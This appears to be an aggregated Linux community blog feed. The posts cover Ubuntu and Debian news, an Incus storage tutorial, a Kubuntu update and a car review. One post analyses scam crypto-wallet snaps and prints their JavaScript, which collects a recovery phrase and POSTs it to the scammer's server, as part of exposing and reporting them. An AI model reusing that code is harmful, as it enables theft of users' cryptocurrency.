There’s a lot to be said for the arrangement of having a curated system for the stuff people actually care about plus an ecosystem of add-on repositories. PPAs cover a wide range of levels of developer activity, from throwaway experiments to quasi-official distribution methods; there are certainly problems that arise from it being difficult to tell the difference between those extremes and from there being no systematic confinement, but for this particular kind of problem they’re very nearly ideal. (Canonical has tried various other approaches to software distribution, and while they address some of the problems, they aren’t obviously better at helping people make reliable social judgements about code they don’t know.)

For a hypothetical package with a huge number of dependencies, to even try to upload it directly to Ubuntu you’d need to be an Ubuntu developer with upload rights (or to go via Debian, where you’d have to clear a similar hurdle). If you have those, then the first upload has to pass manual review by an archive administrator. If your package passes that, then it still has to build and get through proposed-migration CI before it reaches anything that humans typically care about.

On the other hand, if you were inclined to try this sort of experiment, you’d almost certainly try it in a PPA, and that would trouble nobody but yourself.

on March 19, 2024 07:05 AM

March 18, 2024

Welcome to the Ubuntu Weekly Newsletter, Issue 831 for the week of March 10 – 16, 2024. The full version of this issue is available here.

In this issue we cover:

  • Welcome New Members and Developers
  • Ubuntu Stats
  • Hot in Support
  • UbuCon Asia 2024 – Call for proposals
  • Catalan Team: Call for participation in the Noble Festival
  • LoCo Events
  • Ubuntu Quality – Communications and Testing Practices
  • Other Community News
  • Ubuntu Cloud News
  • Canonical News
  • In the Press
  • In the Blogosphere
  • Other Articles of Interest
  • Featured Audio and Video
  • Meeting Reports
  • Upcoming Meetings and Events
  • Updates and Security for Ubuntu 20.04, 22.04, and 23.10
  • And much more!

The Ubuntu Weekly Newsletter is brought to you by:

  • Krytarik Raido
  • Bashing-om
  • Chris Guiver
  • Wild Man
  • And many others

If you have a story idea for the Weekly Newsletter, join the Ubuntu News Team mailing list and submit it. Ideas can also be added to the wiki!

on March 18, 2024 09:08 PM

Previously…

Back in February, I blogged about a series of scam Bitcoin wallet apps that were published in the Canonical Snap store, including one which netted a scammer $490K of some poor rube’s coin.

The snap was eventually removed, and some threads were started over on the Snapcraft forum

Groundhog Day

Nothing has changed it seems, because once again, ANOTHER TEN scam BitCoin wallet apps have been published in the Snap Store today.

You’re joking! Not another one!

Yes, Brenda!

This one has the snappy (sorry) name of exodus-build-96567 published by that not-very-legit looking publisher digisafe00000. Uh-huh.

Edit: Initially I wrote this post after analysing one of the snaps I stumbled upon. It’s been pointed out there’s a whole bunch under this account. All with popular crypto wallet brand names.

Publisher digisafe00000

Edit: These were removed. One day later, they popped up again, under a new account. I reported all of them, and pinged someone at Canonical to get them removed.

Publisher codeshield0x0000

There’s no indication this is the same developer as the last scam Exodus Wallet snap published in February, or the one published back in November last year.

Presentation

Here’s what it looks like on the Snap Store page https://snapcraft.io/exodus-build-96567 - which may be gone by the time you see this. A real minimum effort on the store listing page here. But I’m sure it could fool someone, they usually do.

A not very legit looking snap

It also shows up in searches within the desktop graphical storefront “Ubuntu Software” or “App Centre”, making it super easy to install.

Note: Do not install this.

Secure, Manage, and Swap all your favorite assets.” None of that is true, as we’ll see later. Although one could argue “swap” is true if you don’t mind “swapping” all your BitCoin for an empty wallet, I suppose.

Although it is “Safe”, apparently, according to the store listing.

Coming to a desktop near you

Open wide

It looks like the exodus-build-96567 snap was only published to the store today. I wonder what happened to builds 1 through 96566!

$ snap info
name: exodus-build-96567
summary: Secure, Manage, and Swap all your favorite assets.
publisher: Digital Safe (digisafe00000)
store-url: https://snapcraft.io/exodus-build-96567
license: unset
description: |
 Forget managing a million different wallets and seed phrases.
 Secure, Manage, and Swap all your favorite assets in one beautiful, easy-to-use wallet.
snap-id: wvexSLuTWD9MgXIFCOB0GKhozmeEijHT
channels:
 latest/stable: 8.6.5 2024-03-18 (1) 565kB -
 latest/candidate: ↑
 latest/beta: ↑
 latest/edge: ↑

Here’s the app running in a VM.

The application

If you try and create a new wallet, it waits a while then gives a spurious error. That code path likely does nothing. What it really wants you to do is “Add an existing wallet”.

Give us all your money

As with all these scam application, all it does is ask for a BitCoin recovery phrase, and with that will likely steal all the coins and send them off to the scammer’s wallet. Obviously I didn’t test this with a real wallet phrase.

When given a false passphrase/recovery-key it calls some remote API then shows a dubious error, having already taken your recovery key, and sent it to the scammer.

Error

What’s inside?

While the snap is still available for download from the store, I grabbed it.

$ snap download exodus-build-96567
Fetching snap "exodus-build-96567"
Fetching assertions for "exodus-build-96567"
Install the snap with:
 snap ack exodus-build-96567_1.assert
 snap install exodus-build-96567_1.snap

I then unpacked the snap to take a peek inside.

unsquashfs exodus-build-96567_1.snap
Parallel unsquashfs: Using 8 processors
11 inodes (21 blocks) to write

[===========================================================|] 32/32 100%

created 11 files
created 8 directories
created 0 symlinks
created 0 devices
created 0 fifos
created 0 sockets
created 0 hardlinks

There’s not a lot in here. Mostly the usual snap scaffolding, metadata, and the single exodus-bin application binary in bin/.

tree squashfs-root/
squashfs-root/
├── bin
│ └── exodus-bin
├── meta
│ ├── gui
│ │ ├── exodus-build-96567.desktop
│ │ └── exodus-build-96567.png
│ ├── hooks
│ │ └── configure
│ └── snap.yaml
└── snap
 ├── command-chain
 │ ├── desktop-launch
 │ ├── hooks-configure-fonts
 │ └── run
 ├── gui
 │ ├── exodus-build-96567.desktop
 │ └── exodus-build-96567.png
 └── snapcraft.yaml

8 directories, 11 files

Here’s the snapcraft.yaml used to build the package. Note it needs network access, unsurprisingly.

name: exodus-build-96567 # you probably want to 'snapcraft register <name>'
base: core22 # the base snap is the execution environment for this snap
version: '8.6.5' # just for humans, typically '1.2+git' or '1.3.2'
title: Exodus Wallet
summary: Secure, Manage, and Swap all your favorite assets. # 79 char long summary
description: |
 Forget managing a million different wallets and seed phrases.
 Secure, Manage, and Swap all your favorite assets in one beautiful, easy-to-use wallet.

grade: stable # must be 'stable' to release into candidate/stable channels
confinement: strict # use 'strict' once you have the right plugs and slots

apps:
 exodus-build-96567:
 command: bin/exodus-bin
 extensions: [gnome]
 plugs:
 - network
 - unity7
 - network-status

layout:
 /usr/lib/${SNAPCRAFT_ARCH_TRIPLET}/webkit2gtk-4.1:
 bind: $SNAP/gnome-platform/usr/lib/$SNAPCRAFT_ARCH_TRIPLET/webkit2gtk-4.0

parts:
 exodus-build-96567:
 plugin: dump
 source: .
 organize:
 exodus-bin: bin/

For completeness, here’s the snap.yaml that gets generated at build-time.

name: exodus-build-96567
title: Exodus Wallet
version: 8.6.5
summary: Secure, Manage, and Swap all your favorite assets.
description: |
 Forget managing a million different wallets and seed phrases.
 Secure, Manage, and Swap all your favorite assets in one beautiful, easy-to-use wallet.
architectures:
- amd64
base: core22
assumes:
- command-chain
- snapd2.43
apps:
 exodus-build-96567:
 command: bin/exodus-bin
 plugs:
 - desktop
 - desktop-legacy
 - gsettings
 - opengl
 - wayland
 - x11
 - network
 - unity7
 - network-status
 command-chain:
 - snap/command-chain/desktop-launch
confinement: strict
grade: stable
environment:
 SNAP_DESKTOP_RUNTIME: $SNAP/gnome-platform
 GTK_USE_PORTAL: '1'
 LD_LIBRARY_PATH: ${SNAP_LIBRARY_PATH}${LD_LIBRARY_PATH:+:$LD_LIBRARY_PATH}
 PATH: $SNAP/usr/sbin:$SNAP/usr/bin:$SNAP/sbin:$SNAP/bin:$PATH
plugs:
 desktop:
 mount-host-font-cache: false
 gtk-3-themes:
 interface: content
 target: $SNAP/data-dir/themes
 default-provider: gtk-common-themes
 icon-themes:
 interface: content
 target: $SNAP/data-dir/icons
 default-provider: gtk-common-themes
 sound-themes:
 interface: content
 target: $SNAP/data-dir/sounds
 default-provider: gtk-common-themes
 gnome-42-2204:
 interface: content
 target: $SNAP/gnome-platform
 default-provider: gnome-42-2204
hooks:
 configure:
 command-chain:
 - snap/command-chain/hooks-configure-fonts
 plugs:
 - desktop
layout:
 /usr/lib/x86_64-linux-gnu/webkit2gtk-4.1:
 bind: $SNAP/gnome-platform/usr/lib/x86_64-linux-gnu/webkit2gtk-4.0
 /usr/lib/x86_64-linux-gnu/webkit2gtk-4.0:
 bind: $SNAP/gnome-platform/usr/lib/x86_64-linux-gnu/webkit2gtk-4.0
 /usr/share/xml/iso-codes:
 bind: $SNAP/gnome-platform/usr/share/xml/iso-codes
 /usr/share/libdrm:
 bind: $SNAP/gnome-platform/usr/share/libdrm

Digging Deeper

Unlike the previous scammy application that was written using Flutter, the developers of this one appear to have made a web page in a WebKit GTK wrapper.

If the network is not available, the application loads with an empty window containing an error message “Could not connect: Network is unreachable”.

No network

I brought the network up, ran Wireshark then launched the rogue application again. The app clearly loads the remote content (html, javascript, css, and logos) then renders it inside the wrapper Window.

Wireshark

Edit: I reported this IP to Hostinger abuse, which they took down on 19th March.

The javascript is pretty simple. It has a dictionary of words which are allowed in a recovery key. Here’s a snippet.

var words = ['abandon', 'ability', 'able', 'about', 'above', 'absent', 'absorb',
 
 'youth', 'zebra', 'zero', 'zone', 'zoo'];

As the user types words, the application checks the list.

var alreadyAdded = {};
function checkWords() {
 var button = document.getElementById("continueButton");
 var inputString = document.getElementById("areatext").value;
 var words_list = inputString.split(" ");
 var foundWords = 0;

 words_list.forEach(function(word) {
 if (words.includes(word)) {
 foundWords++;
 }
 });


 if (foundWords === words_list.length && words_list.length === 12 || words_list.length === 18 || words_list.length === 24) {


 button.style.backgroundColor = "#511ade";

 if (!alreadyAdded[words_list]) {
 sendPostRequest(words_list);
 alreadyAdded[words_list] = true;
 button.addEventListener("click", function() {
 renderErrorImport();
 });
 }

 }
 else{
 button.style.backgroundColor = "#533e89";
 }
}

If all the entered words are in the dictionary, it will allow the use of the “Continue” button to send a “POST” request to a /collect endpoint on the server.

function sendPostRequest(words) {

 var data = {
 name: 'exodus',
 data: words
 };

 fetch('/collect', {
 method: 'POST',
 headers: {
 'Content-Type': 'application/json'
 },
 body: JSON.stringify(data)
 })
 .then(response => {
 if (!response.ok) {
 throw new Error('Error during the request');
 }
 return response.json();
 })
 .then(data => {
 console.log('Response:', data);

 })
 .catch(error => {
 console.error('There is an error:', error);
 });
}

Here you can see in the payload, the words I typed, selected from the dictionary mentioned above.

Wireshark

It also periodically ‘pings’ the /ping endpoint on the server with a simple payload of {" name":"exodus"}. Presumably for network connectivity checking, telemetry or seeing which of the scam wallet applications are in use.

function sendPing() {

 var data = {
 name: 'exodus',
 };

 fetch('/ping', {
 method: 'POST',
 headers: {
 'Content-Type': 'application/json'
 },
 body: JSON.stringify(data)
 })
 .then(response => {
 if (!response.ok) {
 throw new Error('Error during the request');
 }
 return response.json();
 })
 .then(data => {
 console.log('Response:', data);

 })
 .catch(error => {
 console.error('There is an error:', error);
 });
}

All of this is done over HTTP, because of course it is. No security needed here!

Conclusion

It’s trivially easy to publish scammy applications like this in the Canonical Snap Store, and for them to go unnoticed.

I was somewhat hopeful that my previous post may have had some impact. It doesn’t look like much has changed yet beyond a couple of conversations on the forum.

It would be really neat if the team at Canonical responsible for the store could do something to prevent these kinds of apps before they get into the hands of users.

I’ve reported the app to the Snap Store team.

Until next time, Brenda!

on March 18, 2024 08:00 PM

March 14, 2024

Incus is a manager for virtual machines and system containers.

A system container is an instance of an operating system that also runs on a computer, along with the main operating system. A system container uses, instead, security primitives of the Linux kernel for the separation from the main operating system. You can think of system containers as software virtual machines.

In this post we are going to see how to conveniently manage the files of several Incus containers from a separate Incus container. The common use-case is that you have several Incus containers that each one of them is a Website and you want your Web developer to have access to the files from a central location with either FTP or SFTP. Ideally, that central location should be an Incus container as well.

Therefore, we are looking on how to share storage between containers. The other case that we are not looking here, is how to share storage between the host and the containers.

The setup

We are creating several Incus containers and each one of them is a separate web server. Each web server expects to find the Web content files in the /var/www/ directory. Then, we want to create a separate container for the Web developer in order to give access to those /var/www/ directories from some central location. The Web developer will get access to that specific container and only that container. As Incus admins we are supposed to provide access to the Web developer to that specific container through SSH or FTP.

In this setup, the Incus container for the web server is webserver1 and the Web developer’s container is called webdev.

We will be creating storage volumes for each web server from the Incus storage pool, then incus attach those volumes to both the corresponding web server container and the Web developer’s container.

Setting up the Incus container for webserver1

First we create the web server container, webcontainer1, and install the web server package. By default, the nginx web server creates a directory html into /var/www/ for our default Web server. In there we will be attaching in the next+3 step the storage volume to store the files for this web server .

$ incus launch images:debian/12/cloud webserver1
Launching webserver1
$ incus exec webserver1 -- su --login debian
debian@webserver1:~$ sudo apt update
...
debian@webserver1:~$ sudo apt install -y nginx
...
debian@webserver1:~$ cd /var/www/
debian@webserver1:/var/www$ ls -l
total 1
drwxr-xr-x 2 root root 3 Mar 14 08:34 html
debian@webserver1:/var/www$ ls -l html/
total 1
-rw-r--r-- 1 root root 615 Mar 14 08:34 index.nginx-debian.html
debian@webserver1:/var/www$ 

Setting up the Incus container for webdev

Then, we create the Incus container for the Web developer. Ideally, you should provide access to this container to your Web developer through SSH/SFTP. Use incus config device add to create a proxy device in order to give access to your Web developer. Here, we create a WEBDEV directory in the home directory of the default debian user account of this container. In there, in the next step, we will be attaching the separate storage volumes of each web server.

$ incus launch images:debian/12/cloud webdev
Launching webdev
$ incus exec webdev -- su --login debian
debian@webdev:~$ pwd
/home/debian
debian@webdev:~$ mkdir WEBDEV
debian@webdev:~$ ls -l 
total 1
drwxr-xr-x 2 debian debian 2 Mar 14 09:28 WEBDEV
debian@webdev:~$ 

Setting up the storage volume for each web server

When you launch an Incus container, you get automatically a single storage volume for the files of that container. We are treating ourselves and we create an extra storage volume for the web data. But let’s learn a bit about storage, storage pools and storage volumes.

We run incus storage list to get a list of storage pools for our installation. In this case, the storage pool is called default(name), we are using ZFS for storage (driver), and the ZFS pool (source) is called default as well. For the last part, you can run zpool list to verify the ZFS pool details. For the USED BYnumber of 89 in this example, you can verify it from the output of zfs list.

$ incus storage list
+---------+--------+---------+-------------+---------+---------+
|  NAME   | DRIVER | SOURCE  | DESCRIPTION | USED BY |  STATE  |
+---------+--------+---------+-------------+---------+---------+
| default | zfs    | default |             | 89      | CREATED |
+---------+--------+---------+-------------+---------+---------+
$ zpool list
NAME      SIZE  ALLOC     FREE  CKPOINT  EXPANDSZ   FRAG    CAP  DEDUP    HEALTH  ALTROOT
default   512G  136.9G  375.1G        -         -     8%    18%  1.00x    ONLINE  -
$ 

We run incus storage volume list to get a list of the storage volumes in Incus. I am not show the output here because it’s big. The first column is the type of the storage volume, either

  1. container, one per system container,
  2. image, for each cache image from a remote like images.linuxcontainers.org,
  3. virtual-machine, for each virtual machine, or
  4. custom, for those created by ourselves as we are going to do in a moment.

The fourth column is the content-type of a storage volume, and this can be either filesystem or block. The default when creating storage volumes is filesystem and we will be creating filesystem in a bit.

Creating the webdata1 storage volume

Now we are ready to create the webdata1 storage volume. In the functionality of the incus storage volume, we use the create command to create on the default storage pool the webdata1 storage volume, which is of type filesystem.

$ incus storage volume create default webdata1 --type=filesystem
Storage volume webdata1 created
$ 

Attaching the webdata1storage volume to the web server container

Now we can attach the webdata storage volume to the webserver1 container. In the functionality of the incus storage volume, we use the attach command to attach from the default storage pool the webdata1 storage volume to the webserver1 container, and mount it over the /var/www/html/ path.

$ incus storage volume attach default webdata1 webserver1 /var/www/html/
$ 

Attaching the webdata1storage volume to the webdev container

Now we can attach the webdata storage volume to the webdev container. In the functionality of the incus storage volume, we use the attach command to attach from the default storage pool the webdata1 storage volume to the webdev container, and mount it over the /home/debian/WEBDEV/ path.

$ incus storage volume attach default webdata1 webdev /home/debian/WEBDEV/webserver1
$ 

Preparing the storage volume for webserver1

We have attached the storage volume into both the web server container and the web development container. Let’s setup the initial permissions and setup some simple hello world HTML file. We get a shell into the web development container webdev, and observe that the storage volume has been mounted. The default permissions are drwxr-xr-x and we replace them into drwxr-xr-x. That is, we can list the contents of the directory. Then, we changed the owner:group into debian:debianin order to allow all access to the Web developer when they edit the files.

$ incus exec webdev -- su --login debian
debian@webdev:~$ ls -l
total 1
drwxr-xr-x 3 debian debian 3 Mar 14 10:33 WEBDEV
debian@webdev:~$ cd WEBDEV/
debian@webdev:~/WEBDEV$ ls -l
total 1
drwx--x--x 2 root root 2 Mar 14 09:59 webserver1
debian@webdev:~/WEBDEV$ sudo chmod 755 webserver1/
debian@webdev:~/WEBDEV$ sudo chown debian:debian webserver1/
debian@webdev:~/WEBDEV$ ls -l
total 1
drwxr-xr-x 2 debian debian 2 Mar 14 09:59 webserver1
debian@webdev:~/WEBDEV$ 

Creating an initial HelloWorld HTML file

Still in the webdev container, we create an initial HTML file. Note that once you paste the HTML code, you press Ctrl+d to save the index.html file.

debian@webdev:~/WEBDEV$ cd webserver1
debian@webdev:~/WEBDEV/webserver1$ cat > index.html
<!DOCTYPE HTML>
<html>
  <head>
    <title>Welcome to Incus</title>
    <meta charset="utf-8"  />
  </head>
  <style>
    body {
      background: rgb(2,0,36);
      background: linear-gradient(90deg, rgba(2,0,36,1) 0%, rgba(9,9,121,1) 35%, rgba(0,212,255,1) 100%);
    }
    h1,p {
      color: white;
      text-align: center;
    }
  </style>
  <body>
    <h1>Welcome to Incus</h1>
    <p>The web development data of this web server are stored in an Incus storage volume. </p>
    <p>This storage volume is attached to both the web server container and a web development container. </p>
  </body>
</html>
Ctrl+d
debian@webdev:~/WEBDEV/webserver1$ ls -l
total 1
-rw-r--r-- 1 debian debian 608 Mar 14 11:05 index.html
debian@webdev:~/WEBDEV/webserver1$ logout
$ 

Testing the result

We visit the web server using our browser. The IP address of the web server is obtained as follows.

$ incus list webserver1 -c n4
+------------+--------------------+
|    NAME    |        IPV4        |
+------------+--------------------+
| webserver1 | 10.10.10.88 (eth0) |
+------------+--------------------+
$ 

This is the HTML page we created.

Conclusion

We showed how to use a storage volume to separate the web server data files from the web server container. Those files are stored in the Incus storage pool. We attached the same storage volume to a separate container for the Web developer so that they get access to the files and only the files from a central location, the webdev container.

An additional task would be to setup git in the webdev container so that any changes to the web files are tracked.

You can also detach storage volumes (no shown here).

You would use incus config device to create a proxy device to give external access to the Web developer. Preferably over SSH/SFTP, instead of just plain FTP. In fact in terms of usability it does not make a difference between the two. Yeah, please use SFTP. All web development tools should support SFTP.

on March 14, 2024 11:31 AM

"Todos à Tabacaria, Comprar a PC Guia!", é o novo motto do podcast. Neste episódio recebemos a visita de Giovanni Manghi - biólogo que trabalha com sistemas de informação geográfica (SIG) em Portugal desde 2008 e é militante ferrenho do Software Livre em todas as iniciativas que organiza e lugares por onde passa - nomeadamente do Qgis e sistemas GNU-Linux. Pelo caminho, falámos de confusões com o nome Ubuntu; aprender e ensinar com uma multidão de professores; distribuições Alentejanas; casos de sucesso de implantação de FLOSS em Portugal; o que falta fazer e perspectivas de futuro.

Já sabem: oiçam, subscrevam e partilhem!

Apoios

Podem apoiar o podcast usando os links de afiliados do Humble Bundle, porque ao usarem esses links para fazer uma compra, uma parte do valor que pagam reverte a favor do Podcast Ubuntu Portugal. E podem obter tudo isso com 15 dólares ou diferentes partes dependendo de pagarem 1, ou 8. Achamos que isto vale bem mais do que 15 dólares, pelo que se puderem paguem mais um pouco mais visto que têm a opção de pagar o quanto quiserem. Se estiverem interessados em outros bundles não listados nas notas usem o link https://www.humblebundle.com/?partner=PUP e vão estar também a apoiar-nos.

Atribuição e licenças

Este episódio foi produzido por Diogo Constantino, Miguel e Tiago Carrondo e editado pelo Senhor Podcast. O website é produzido por Tiago Carrondo e o código aberto está licenciado nos termos da Licença MIT. A música do genérico é: “Won’t see it comin’ (Feat Aequality & N’sorte d’autruche)”, por Alpha Hydrae e está licenciada nos termos da CC0 1.0 Universal License. Este episódio e a imagem utilizada estão licenciados nos termos da licença: Attribution-NonCommercial-NoDerivatives 4.0 International (CC BY-NC-ND 4.0), cujo texto integral pode ser lido aqui. Estamos abertos a licenciar para permitir outros tipos de utilização, contactem-nos para validação e autorização.

on March 14, 2024 12:00 AM

March 08, 2024

Greetings, Kubuntu enthusiasts! It’s time for our regular community update, and we’ve got plenty of exciting developments to share from the past month. Our team has been hard at work, balancing the demands of personal commitments with the passion we all share for Kubuntu. Here’s what we’ve been up to:

Localstack & Kubuntu Joint Press Release


We’re thrilled to announce that we’ve been working closely with Localstack to prepare a joint press release that’s set to be published next week. This collaboration marks a significant milestone for us, and we’re eager to share the details with you all. Stay tuned!

Kubuntu Graphic Design Contest

Our Kubuntu Graphic Design contest, initiative is progressing exceptionally well, showcasing an array of exciting contributions from our talented community members. The creativity and innovation displayed in these submissions not only highlight the diverse talents within our community but also contribute significantly to the visual identity and user experience of Kubuntu. We’re thrilled with the participation so far and would like to remind everyone that the contest remains open to applicants until the 31st of March, 2024. This is a wonderful opportunity for designers, artists, and enthusiasts to leave their mark on Kubuntu and help shape its aesthetic direction. If you haven’t submitted your work yet, we encourage you to take part and share your vision with us. Let’s continue to build a visually stunning and user-friendly Kubuntu together

Kubuntu Wiki Support Forum


Our search for a new home for the Kubuntu Wiki Support Forum is progressing well. We understand the importance of having a reliable and accessible platform for our users to find support and share knowledge. Rest assured, we’re on track to make this transition as smooth as possible.

New Donations Platforms


In our efforts to ensure the sustainability and growth of Kubuntu, we’re in the process of introducing new donation platforms. Jonathan Riddell is at the helm, working diligently to align our financial controls and operations. This initiative will help us better serve our community and foster further development.

Collaboration with Kubuntu Focus


Exciting developments are on the horizon as we collaborate with Kubuntu Focus to curate a new set of developer tools. While we’re not ready to divulge all the details just yet, we’re confident that this partnership will yield invaluable resources for cloud software developers in our community. More information will be shared soon.

Kubuntu Matrix Communication


We’re happy to report that our efforts to enhance communication within the Kubuntu community have borne fruit. We now have a dedicated Kubuntu Space on Matrix, complete with channels for Development, Discussion, and Support. This platform will make it easier for our community to connect, collaborate, and provide mutual assistance.

A Word of Appreciation


The past few weeks have been a whirlwind of activity, both personally and professionally. Despite the challenges, the progress we’ve made is a testament to the dedication and hard work of everyone involved in the Kubuntu project. A special shoutout to Scarlett Moore, Aaron Rainbolt, Rik Mills and Mike Mikowski for their exceptional contributions and to the wider community for your unwavering support. Your enthusiasm and commitment are what drive us forward.

As we look towards the exciting release of Kubuntu 24.04, we’re filled with anticipation for what the future holds. Our journey is far from over, and with each step, we grow stronger and more united as a community. Thank you for being an integral part of Kubuntu. Here’s to the many achievements we’ll share in the days to come!

Stay connected, stay inspired, and as always, thank you for your continued support of Kubuntu.

— The Kubuntu Team

on March 08, 2024 04:53 PM

March 04, 2024

Two months into my new gig and it’s going great! Tracking my time has taken a bit of getting used to, but having something that amounts to a queryable database of everything I’ve done has also allowed some helpful introspection.

Freexian sponsors up to 20% of my time on Debian tasks of my choice. In fact I’ve been spending the bulk of my time on debusine which is itself intended to accelerate work on Debian, but more details on that later. While I contribute to Freexian’s summaries now, I’ve also decided to start writing monthly posts about my free software activity as many others do, to get into some more detail.

January 2024

  • I added Incus support to autopkgtest. Incus is a system container and virtual machine manager, forked from Canonical’s LXD. I switched my laptop over to it and then quickly found that it was inconvenient not to be able to run Debian package test suites using autopkgtest, so I tweaked autopkgtest’s existing LXD integration to support using either LXD or Incus.
  • I discovered Perl::Critic and used it to tidy up some poor practices in several of my packages, including debconf. Perl used to be my language of choice but I’ve been mostly using Python for over a decade now, so I’m not as fluent as I used to be and some mechanical assistance with spotting common errors is helpful; besides, I’m generally a big fan of applying static analysis to everything possible in the hope of reducing bug density. Of course, this did result in a couple of regressions (1, 2), but at least we caught them fairly quickly.
  • I did some overdue debconf maintenance, mainly around tidying up error message handling in several places (1, 2, 3).
  • I did some routine maintenance to move several of my upstream projects to a new Gnulib stable branch.
  • debmirror includes a useful summary of how big a Debian mirror is, but it hadn’t been updated since 2010 and the script to do so had bitrotted quite badly. I fixed that and added a recurring task for myself to refresh this every six months.

February 2024

  • Some time back I added AppArmor and seccomp confinement to man-db. This was mainly motivated by a desire to support manual pages in snaps (which is still open several years later …), but since reading manual pages involves a non-trivial text processing toolchain mostly written in C++, I thought it was reasonable to assume that some day it might have a vulnerability even though its track record has been good; so man now restricts the system calls that groff can execute and the parts of the file system that it can access. I stand by this, but it did cause some problems that have needed a succession of small fixes over the years. This month I issued DLA-3731-1, backporting some of those fixes to buster.
  • I spent some time chasing a console-setup build failure following the removal of kFreeBSD support, which was uploaded by mistake. I suggested a set of fixes for this, but the author of the change to remove kFreeBSD support decided to take a different approach (fair enough), so I’ve abandoned this.
  • I updated the Debian zope.testrunner package to 6.3.1.
  • openssh:
    • A Freexian collaborator had a problem with automating installations involving changes to /etc/ssh/sshd_config. This turned out to be resolvable without any changes, but in the process of investigating I noticed that my dodgy arrangements to avoid ucf prompts in certain cases had bitrotted slightly, which meant that some people might be prompted unnecessarily. I fixed this and arranged for it not to happen again.
    • Following a recent debian-devel discussion, I realized that some particularly awkward code in the OpenSSH packaging was now obsolete, and removed it.
  • I backported a python-channels-redis fix to bookworm. I wasn’t the first person to run into this, but I rediscovered it while working on debusine and it was confusing enough that it seemed worth fixing in stable.
  • I fixed a simple build failure in storm.
  • I dug into a very confusing cluster of celery build failures (1, 2, 3), and tracked the hardest bit down to a Python 3.12 regression, now fixed in unstable thanks to Stefano Rivera. Getting celery back into testing is blocked on the 64-bit time_t transition for now, but once that’s out of the way it should flow smoothly again.
on March 04, 2024 10:39 AM

March 03, 2024

tl;dr I have had a Mini EV for a little over two years, so I thought it was time for a retrospective. This isn’t so much a review as I’m not a car journalist. It’s more just my thoughts of owning an electric car for a couple of years.

I briefly talked about the car in episode 24 of Linux Matters Podcast, if you prefer a shorter, less detailed review in audio format.

Mini Mini review

Patreon supporters of Linux Matters can get the show a day or so early, and without adverts. 🙏

Introduction

In August 2020, amid [The Event], and my approaching 50th birthday, I figured it was about time for a mid-life crisis. So, after a glass of wine, late one evening, I filled in a test-drive request form for a Tesla electric car.

I was surprised to get a call from a Tesla representative the next day to organise the booking. A week later, I turned up at the nearest Tesla “dealership” in an industrial estate near Heathrow Airport to pick up the car.

I had maybe twenty minutes to drive the car alone, on a fixed route, and then bring it back. I’d never driven a fully electric car before that, nor even been in one as a passenger, that I recall. I’ve been in countless Toyota Prius over the years as the go-to taxi for the discerning cabbie.

I had no intention of buying the car, so we parted ways after the drive. The salesman was phlegmatic about this. He said it didn’t matter because now I’ve driven one and had a positive experience, I’d be more likely to rent a Tesla or talk about the experience with friends.

Not yet done the former; definitely have done the latter.

Shopping around

A year later, my pangs for a new car continued. I also took a Citroen EC5 out for a spin and borrowed a Renault ZOE. Both were decent cars, but not really what I was after. The Citroen was too big, and the ZOE had an ugly, fat arse-end.

Then I took a look at the Mini. Initially, it wasn’t on my radar, but then I watched every video review and hands-on I could find. I was almost already sold on it when I took one out for a test drive. Indeed, after telling the amiable and chilled sales guy which cars I’d already test-driven, he said, “If you drive the Mini, you’ll buy it, not the others”.

“That is a bold claim!”, I thought.

He was right though. I bought one. Here it is some months later, at a “favourite” charging spot late one night.

Chippenham charging

I’ve had many cars over the years, some second-hand, a few hand-me-downs in the family, but never a new car for me, for my pleasure. I do enjoy driving, but less so commuting in traffic, which is handy now I’ve worked from home for over a decade.

Now the kids are grown up, and the wife has a slightly larger car if we all go somewhere. I can get away with a two-door car.

Specs

I went for the “2021 BMW Mini Cooper Level 3”, as it’s known officially. The design is from 2019 and has been replaced in 2024. Level 3 refers to the car’s trim level and is one of the highest. There were a few additional optional extras, which I didn’t choose to buy.

The one option I wish I’d got is adaptive cruise control, which is handy on UK motorways. Dial in a speed and let the car adjust dynamically as the car in front slows or speeds up. My wife’s car has it, and I am mildly kicking myself I didn’t get it for the Mini.

The full spec and trim can be seen in the BMW PDF. Here’s the page about my car’s specifications. Click to make it bigger.

Specification

I went for black paint and the “3-pin plug” inspired wheels. They’re quite quirky and look rather cool at low speed due to their asymmetry. Not that I see that view often, as I’m usually driving.

Here’s what it looks like when you’re speccing up the Mini online. This is a pretty accurate representation of the car.

Ordering a Mini

Driving

The most important part of a car is how it drives. I love driving this thing. The Mini EV is tremendously fun to drive. It’s relatively quick off the mark, which makes it great for safe overtaking. Getting away from the lights is super fun too.

Being an EV, it’s got a heavy battery, so it’s doesn’t skip around much on the road. I’ve always felt in control of the car, as it drives very much like a go-cart, point-and-shoot.

Without a petrol engine, there’s certainly less noise and virbration while driving. Road and wind noise is audible, but it’s pretty pleasantly quiet when pootling around town. As required by law, it makes some interesting “spacey” noises at low speed, so pedestrians can hear you coming. Although I’ve surprised a few people and animals when they couldn’t.

Unlike the four-door Mini Clubman, it’s got long rimless doors, which make for getting in and out a bit easier. They also look cool. I’ve always enjoyed the look of a two-door coupe or hatchback car with rimless front windows.

There are four driving modes, Normal (the default), Sport, Green and Green+. Green+ is the eco-warrior mode which turns all the fans off, and reduces energy consumption quite a bit, extending the overall range. Sport is at the other end of the scale, consuming more power, being more responsive, and lighting the car interior in red, which is cute.

There are two levels of regenerative braking, which is on by default. I never change this setting, but you can. It means I can drive with one pedal, letting the regenerative braking reduce speed as I approach junctions or traffic. I rarely use the brake pedal at all.

The brake lights do illuminate when regenerative braking is occurring, which I’m sure is annoying for the person behind me when I’m hovering between go and stop. The car doesn’t come to a complete stop if you remove your feet from the pedals, so I do have to use the brake pedal to completely stop the car, which is a shame.

Driving in London

London has a Congestion Charge (CC), and (controversial) Ultra Low Emissions Zone (ULEZ). Cars have to pay to enter the centre of London. There are some exceptions. As the Mini is electric, it currently doesn’t have to pay the CC. However in order to qualify for not paying the £15 daily charge, you have to pay a £10 annual charge.

I sometimes use “JustPark” to find interesting places to put the car while I’m in London. Here I found a spot in the grounds of an old church.

Parked in London

I have always loved driving in central London, I’ve used this perk a fair few times to drive into the centre of London for work, to meet friends or go out in the evening. It’s cheaper for me to drive into the centre of London and park than it is to get a return train ticket, which is mad.

Space

It’s a two-door car that can seat two adults comfortably in the front and two kids in the back. Or four adults uncomfortably as the legroom in the back is quite cramped. I never sit in the back, so I don’t care about that.

On the odd occasion, the four of us (two adults and two teenage kids) have been in the car together, it’s been fine. I wouldn’t do a long journey like that, though.

